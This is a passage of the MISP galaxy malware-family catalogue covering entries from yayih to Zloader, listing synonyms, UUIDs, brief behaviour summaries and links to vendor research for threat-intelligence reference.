Associated metadata
Metadata key | Value |
---|---|
type | [] |
yayih
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular yayih.
Known Synonyms |
---|
aumlib |
bbsinfo |
Internal MISP references
UUID 81157066-c2f6-4625-8070-c0a793d57e18
which can be used as unique global reference for yayih
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Yellow Cockatoo RAT
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Yellow Cockatoo RAT.
Known Synonyms |
---|
Polazer |
Internal MISP references
UUID f1d49672-b857-4ad6-887f-f2bf2bc7c641
which can be used as unique global reference for Yellow Cockatoo RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Yoddos
Internal MISP references
UUID 8d67586f-3390-474b-a81e-8be90833f25f
which can be used as unique global reference for Yoddos
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
YoreKey
Internal MISP references
UUID cf9b5867-77db-423d-9bdf-cfc0d24d39c9
which can be used as unique global reference for YoreKey
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.yorekey - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/triple-threat-north-korea-aligned-ta406-scams-spies-and-steals - webarchive
- https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-threat-insight-paper-triple-threat-N-Korea-aligned-TA406-steals-scams-spies.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
YoungLotus
Simple malware with proxy/RDP and download capabilities. It often comes bundled with installers, in particular in the Chinese realm.
PE timestamps suggest that it came into existence in the second half of 2014.
Some versions perform checks of the status of the internet connection (InternetGetConnectedState: MODEM, LAN, PROXY), some versions perform simple AV process-checks (CreateToolhelp32Snapshot).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular YoungLotus.
Known Synonyms |
---|
DarkShare |
Internal MISP references
UUID 1cc9d450-88cd-435c-bb74-8410d2d22571
which can be used as unique global reference for YoungLotus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
YourCyanide
According to Trend Micro, this is a ransomware written as a Windows commandline script, with obfuscation applied.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular YourCyanide.
Known Synonyms |
---|
GonnaCope |
Kekpop |
Kekware |
Internal MISP references
UUID 4a9b8725-2d17-4601-adb4-67de607808d7
which can be used as unique global reference for YourCyanide
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
YTStealer
According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it’s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.
Internal MISP references
UUID 302854bd-0e03-422c-8b79-54200c7d02ea
which can be used as unique global reference for YTStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
yty
Internal MISP references
UUID c0e8b64c-bd2c-4a3e-addc-0ed6cc1ba200
which can be used as unique global reference for yty
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.yty - webarchive
- https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/ - webarchive
- https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/ - webarchive
- https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/ - webarchive
- https://www.secureworks.com/research/threat-profiles/zinc-emerson - webarchive
- https://www.amnesty.org/en/wp-content/uploads/2021/10/AFR5747562021ENGLISH.pdf - webarchive
- https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/ - webarchive
- http://blog.ptsecurity.com/2019/11/studying-donot-team.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Yunsip
W32/Yunsip!tr.pws is classified as a password-stealing trojan. A password-stealing trojan searches the infected system for passwords and sends them to the hacker.
Internal MISP references
UUID 1f8755ac-3dcc-43bd-a07f-cf0fbf2cdb7d
which can be used as unique global reference for Yunsip
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Z3
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Z3.
Known Synonyms |
---|
Z3enc Ransomware |
Internal MISP references
UUID 3eb96cd0-2d00-45a8-a0a4-54663cc70ab9
which can be used as unique global reference for Z3
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zacinlo
Bitdefender describes the primary features of the family as follows: presence of a rootkit driver that protects itself as well as its other components, presence of man-in-the-browser capabilities that intercept and decrypt SSL communications, and presence of an adware cleanup routine used to remove potential competition in the adware space. It also communicates with its C&C server, sending environment information such as installed AV and other applications. The malware also takes screenshots and performs browser redirects, potentially manipulating the DOM tree. It also generates traffic in hidden windows, likely for ad fraud. The malware is generally very configurable and internally makes use of Lua scripts.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zacinlo.
Known Synonyms |
---|
s5mark |
Internal MISP references
UUID 5041fed8-25a2-4da2-b2ab-db2364cc064f
which can be used as unique global reference for Zacinlo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZarDoor
Internal MISP references
UUID e4f7e46a-65b8-4d17-b4d8-a2f8b2047c22
which can be used as unique global reference for ZarDoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zebrocy
According to Brandefense, Zebrocy is malware in the Trojan category that the threat actor group APT28/Sofacy has used since 2015. Zebrocy consists of three main components: a Backdoor, a Downloader, and a Dropper. The Downloader and Dropper are responsible for discovery and for downloading the main malware onto the system, while the Backdoor handles duties such as persistence on the system, espionage, and data extraction.
This malware, which is not considered new, has variants in many languages from the past to the present. These include programming languages such as Delphi, C#, Visual C++, VB.net, and Golang. Furthermore, we know advanced threat actors and groups revise their malicious software among their toolkits at certain time intervals using different languages and technologies.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zebrocy.
Known Synonyms |
---|
Zekapab |
Internal MISP references
UUID 973124e2-0d84-4be5-9c8e-3ff16bb43b42
which can be used as unique global reference for Zebrocy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy - webarchive
- https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government - webarchive
- https://research.checkpoint.com/malware-against-the-c-monoculture/ - webarchive
- https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ - webarchive
- https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html - webarchive
- https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og - webarchive
- https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- https://securelist.com/greyenergys-overlap-with-zebrocy/89506/ - webarchive
- https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ - webarchive
- https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/fighting-ursa/ - webarchive
- https://meltx0r.github.io/tech/2019/10/24/apt28.html - webarchive
- https://securelist.com/zebrocys-multilanguage-malware-salad/90680/ - webarchive
- https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/ - webarchive
- https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/ - webarchive
- https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/ - webarchive
- https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html - webarchive
- https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/ - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/ - webarchive
- https://securelist.com/a-zebrocy-go-downloader/89419/ - webarchive
- https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf - webarchive
- https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/ - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf - webarchive
- https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://brandefense.io/zebrocy-malware-technical-analysis-report/ - webarchive
- https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware - webarchive
- https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zebrocy (AutoIT)
Internal MISP references
UUID 4a5f2088-18cb-426a-92e2-1eb752c294c0
which can be used as unique global reference for Zebrocy (AutoIT)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy_au3 - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ - webarchive
- https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zedhou
Internal MISP references
UUID 2211eade-4980-4143-acd7-5ecda26d9dfa
which can be used as unique global reference for Zedhou
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
zenar
Internal MISP references
UUID 7502f293-0b7f-417f-a13a-1c71dadc5ccc
which can be used as unique global reference for zenar
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zeoticus
Internal MISP references
UUID 92e89ff1-eae9-4d71-9031-80cca544952e
which can be used as unique global reference for Zeoticus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zeppelin
Zeppelin is a ransomware written in Delphi and sold as-a-service. The Cylance research team notes that it is a clear evolution of the known VegaLocker, but assessed it as a new family because of additionally developed modules that make Zeppelin much more configurable than VegaLocker. Executable variants exist as both DLL and EXE.
Internal MISP references
UUID 5587d163-d5ec-43fc-8071-7e7cd1002ba7
which can be used as unique global reference for Zeppelin
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zeppelin - webarchive
- https://www.gdatasoftware.com/blog/2020/06/35946-burans-transformation-into-zeppelin - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618 - webarchive
- https://community.riskiq.com/article/47766fbd - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-223a - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-223A_Zeppelin_CSA.pdf - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-249a - webarchive
- https://www.intrinsec.com/vice-society-spreads-its-own-ransomware/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ - webarchive
- https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/ - webarchive
- https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html - webarchive
- https://storage.pardot.com/272312/124918/Flashpoint_Hunt_Team___Zeppelin_Ransomware_Analysis.pdf - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZeroAccess
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZeroAccess.
Known Synonyms |
---|
Max++ |
Sirefef |
Smiscer |
Internal MISP references
UUID c7ff274f-2acc-4ee2-b74d-f1def12918d7
which can be used as unique global reference for ZeroAccess
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess - webarchive
- http://resources.infosecinstitute.com/zeroaccess-malware-part-4-tracing-the-crimeware-origins-by-reversing-injected-code/ - webarchive
- http://resources.infosecinstitute.com/zeroaccess-malware-part-3-the-device-driver-process-injection-rootkit/ - webarchive
- http://contagiodump.blogspot.com/2012/12/zeroaccess-sirefef-rootkit-5-fresh.html - webarchive
- http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessmaxsmiscer-crimeware-rootkit/ - webarchive
- http://resources.infosecinstitute.com/zeroaccess-malware-part-2-the-kernel-mode-device-driver-stealth-rootkit/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/ - webarchive
- http://contagiodump.blogspot.com/2010/11/zeroaccess-max-smiscer-crimeware.html - webarchive
- https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail - webarchive
- https://blog.malwarebytes.com/threat-analysis/2013/08/sophos-discovers-zeroaccess-using-rlo/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2013/07/zeroaccess-anti-debug-uses-debugger/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZeroCleare
ZeroCleare is a destructive malware. It was developed to wipe the master boot record in order to damage a disk's partitioning. The attackers use the EldoS RawDisk driver to perform the malicious action; this driver is not signed and would therefore not be runnable by default. The attackers managed to load it by using a vulnerable version of the VBoxDrv driver, which Driver Signature Enforcement (DSE) accepts and runs. It was used to attack Middle East energy and industrial sectors.
Internal MISP references
UUID a7e1429f-55bd-41ac-bf45-70c93465d113
which can be used as unique global reference for ZeroCleare
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zerocleare - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government - webarchive
- https://www.ibm.com/downloads/cas/OAJ4VZNJ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZeroEvil
ZeroEvil is a malware that seems to be distributed by an ARSguarded VBS loader.
It first connects to a gate.php (version=). Upon success, an embedded VBS is started that connects to logs_gate.php (plugin=, report=). So far, only one embedded VBS has been observed: it creates and starts a PowerShell script to retrieve all passwords from the Windows.Security.Credentials.PasswordVault. Apart from that, a screenshot is taken and a list of running processes is generated.
The ZeroEvil executable contains multiple DLLs, sqlite3.dll, ze_core.DLL (Mutex) and ze_autorun.DLL (Run-Key).
Internal MISP references
UUID 585f9f75-1239-4561-8815-c5ae033053a1
which can be used as unique global reference for ZeroEvil
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZeroLocker
Internal MISP references
UUID b226e6bb-b8bf-4c5d-b0b3-c7c04d12679a
which can be used as unique global reference for ZeroLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zeropadypt
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zeropadypt.
Known Synonyms |
---|
Ouroboros |
Internal MISP references
UUID b8f99ed3-5669-4c71-b217-e92659a6e6bd
which can be used as unique global reference for Zeropadypt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZeroT
Internal MISP references
UUID 9b0aa458-dfa9-48af-87ea-c36d1501376c
which can be used as unique global reference for ZeroT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zeus
According to CrowdStrike, the two primary goals of the Zeus trojan are stealing people's financial information and adding machines to a botnet. Unlike many types of malware, most Zeus variants try to avoid doing long-term damage to the devices they infect; their aim is to avoid detection by antivirus software.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zeus.
Known Synonyms |
---|
Zbot |
Internal MISP references
UUID 4e8c1ab7-2841-4823-a5d1-39284fb0969a
which can be used as unique global reference for Zeus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus - webarchive
- http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html - webarchive
- http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html - webarchive
- http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/ - webarchive
- http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html - webarchive
- https://www.anomali.com/files/white-papers/russian-federation-country-profile.pdf - webarchive
- https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/ - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html - webarchive
- https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/ - webarchive
- http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf - webarchive
- https://krebsonsecurity.com/2022/11/top-zeus-botnet-suspect-tank-arrested-in-geneva/ - webarchive
- https://www.justice.gov/opa/pr/foreign-national-pleads-guilty-role-cybercrime-schemes-involving-tens-millions-dollars - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-evergreen - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf - webarchive
- https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-woodland - webarchive
- http://eternal-todo.com/blog/detecting-zeus - webarchive
- http://eternal-todo.com/blog/zeus-spreading-facebook - webarchive
- http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html - webarchive
- https://nakedsecurity.sophos.com/2010/07/24/sample-run/ - webarchive
- https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf - webarchive
- https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group - webarchive
- https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20 - webarchive
- http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-evergreen - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://unit42.paloaltonetworks.com/banking-trojan-techniques/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://www.crowdstrike.com/cybersecurity-101/malware/trojan-zeus-malware - webarchive
- https://www.s21sec.com/en/zeus-the-missing-link/ - webarchive
- https://www.mnin.org/write/ZeusMalware.pdf - webarchive
- https://securelist.com/financial-cyberthreats-in-2020/101638/ - webarchive
- https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite - webarchive
- https://www.wired.com/2017/03/russian-hacker-spy-botnet/ - webarchive
- https://www.nrc.nl/nieuws/2021/04/02/the-cesspool-of-the-internet-is-to-be-found-in-a-village-in-north-holland-a4038369 - webarchive
- https://www.cisecurity.org/insights/blog/top-10-malware-march-2022 - webarchive
- https://www.bleepingcomputer.com/news/security/zeus-icedid-malware-gangs-leader-pleads-guilty-faces-40-years-in-prison/ - webarchive
- https://www.secureworks.com/research/zeus?threat=zeus - webarchive
- http://eternal-todo.com/blog/new-zeus-binary - webarchive
- http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html - webarchive
- https://blog.malwarebytes.com/101/2021/07/the-life-and-death-of-the-zeus-trojan/ - webarchive
- https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZeusAction
Internal MISP references
UUID 95057d7a-b95a-4173-bae7-9256ae002543
which can be used as unique global reference for ZeusAction
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zeus MailSniffer
Internal MISP references
UUID 768f1ae5-81a6-49f2-87c1-821c247b4bf3
which can be used as unique global reference for Zeus MailSniffer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zeus OpenSSL
This family describes the Zeus-variant that includes a version of OpenSSL and usually is downloaded by Zloader.
In June 2016, version 1.5.4.0 (PE timestamp: 2016.05.11) appeared, downloaded by Zloader (known as DEloader at that time). OpenSSL 1.0.1p is statically linked into it, thus its size is roughly 1.2 MB. In subsequent months, that size increased up to 1.6 MB. In January 2017, with version 1.14.8.0, OpenSSL 1.0.2j was linked into it, increasing the size to 1.8 MB. Soon after, also in January 2017, with version v1.15.0.0, the code was obfuscated, blowing up the size of the binary to 2.2 MB.
Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl, the X referring to IBM X-Force.
Zeus Sphinx on the one hand has the following versioning ("slow increase"):
- 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)
- 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)
- 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)
Zeus OpenSSL on the other hand has the following versioning ("fast increase"):
- 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)
- 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)
- 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Zeus OpenSSL.
Known Synonyms |
---|
XSphinx |
Internal MISP references
UUID 74fc6a3a-cc51-4065-bdd9-fcef18c988a0
which can be used as unique global reference for Zeus OpenSSL
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_openssl - webarchive
- https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/ - webarchive
- https://securityintelligence.com/brazil-cant-catch-a-break-after-panda-comes-the-sphinx/ - webarchive
- https://securityintelligence.com/posts/zeus-sphinx-trojan-awakens-amidst-coronavirus-spam-frenzy/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zeus Sphinx
This family describes the vanilla Zeus variant that includes TOR (and the Polipo proxy). It has an almost 90% overlap with Zeus v2.0.8.9. Please note that IBM X-Force decided to call win.zloader/win.zeus_openssl "Zeus Sphinx", after mentioning it as "a new version of Zeus Sphinx" in their initial post in August 2016. Malpedia thus lists the alias "Zeus XSphinx" for win.zeus_openssl, the X referring to IBM X-Force.
Zeus Sphinx on the one hand has the following versioning ("slow increase"):
- 2015/09 v1.0.1.0 (Zeus Sphinx size: 1.5 MB)
- 2016/02 v1.0.1.2 (Zeus Sphinx size: 1.5 MB)
- 2016/04 v1.0.2.0 (Zeus Sphinx size: 1.5 MB)
Zeus OpenSSL on the other hand has the following versioning ("fast increase"):
- 2016/05 v1.5.4.0 (Zeus OpenSSL size: 1.2 MB)
- 2017/01 v1.14.8.0 (Zeus OpenSSL size: 1.8 MB)
- 2017/01 v1.15.0.0 (Zeus OpenSSL size: 2.2 MB)
Internal MISP references
UUID 997c20b0-0992-498a-b69d-fc16ab2fd4e4
which can be used as unique global reference for Zeus Sphinx
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx - webarchive
- https://securityintelligence.com/posts/zeus-sphinx-back-in-business-some-core-modifications-arise/ - webarchive
- https://web.archive.org/web/20160130165709/http://darkmatters.norsecorp.com/2015/08/24/sphinx-new-zeus-variant-for-sale-on-the-black-market/ - webarchive
- https://securityaffairs.co/wordpress/39592/cyber-crime/sphinx-variant-zeus-trojan.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zezin
Internal MISP references
UUID 38de079b-cc4c-47b0-b47f-ad4c013d8a1f
which can be used as unique global reference for Zezin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
zgRAT
zgRAT is a Remote Access Trojan that sometimes drops other malware such as AgentTesla. zgRAT also has an infostealer function that targets browser information and cryptowallets. It usually spreads via USB or via phishing emails with .zip/.lnk/.bat/.xlsx attachments and the like.
Internal MISP references
UUID 0c3ea882-72a7-4838-b79a-150be30b6a36
which can be used as unique global reference for zgRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat - webarchive
- https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities - webarchive
- https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US - webarchive
- https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ - webarchive
- https://bazaar.abuse.ch/browse/signature/zgRAT/ - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZhCat
Internal MISP references
UUID 3c74a04d-583e-40ec-b347-bdfeb534c614
which can be used as unique global reference for ZhCat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZhMimikatz
Internal MISP references
UUID 989330e9-52da-4489-888b-686429db3a45
which can be used as unique global reference for ZhMimikatz
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZingoStealer
An information stealer written in .NET.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZingoStealer.
Known Synonyms |
---|
Ginzo |
Internal MISP references
UUID 3984dfa1-45dc-4c19-92ca-3b90b89c8c62
which can be used as unique global reference for ZingoStealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.zingo_stealer - webarchive
- https://blog.talosintelligence.com/haskers-gang-zingostealer/ - webarchive
- https://blogs.blackberry.com/en/2022/05/threat-thursday-zingostealer - webarchive
- https://www.gdatasoftware.com/blog/2022/03/ginzo-free-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZitMo
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ZitMo.
Known Synonyms |
---|
ZeuS-in-the-Mobile |
Internal MISP references
UUID 6f08bd79-d22a-471c-882b-f68a42eb4a23
which can be used as unique global reference for ZitMo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ZiyangRAT
Internal MISP references
UUID c23aac20-4987-4c15-af63-7043026c5f82
which can be used as unique global reference for ZiyangRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Zloader
This family describes the (initially small) loader, which downloads Zeus OpenSSL.
In June 2016, a new loader was dubbed DEloader by Fortinet. It has some functions borrowed from Zeus 2.0.8.9 (e.g. the versioning, nrv2b, binstorage-labels), but more importantly, it downloaded a Zeus-like banking trojan (-> Zeus OpenSSL). Furthermore, the loader shared its versioning with the Zeus OpenSSL it downloaded. The initial samples from May 2016 were small (17920 bytes). At some point, visualEncrypt/Decrypt was added, e.g. in v1.11.0.0 (September 2016) with size 27648 bytes. In January 2017 with v1.15.0.0, obfuscation was added, which blew the size up to roughly 80k, and the loader became known as Zloader aka Terdot. These changes may be related to the Moskalvzapoe Distribution Network, which started the distribution of it at the same time.
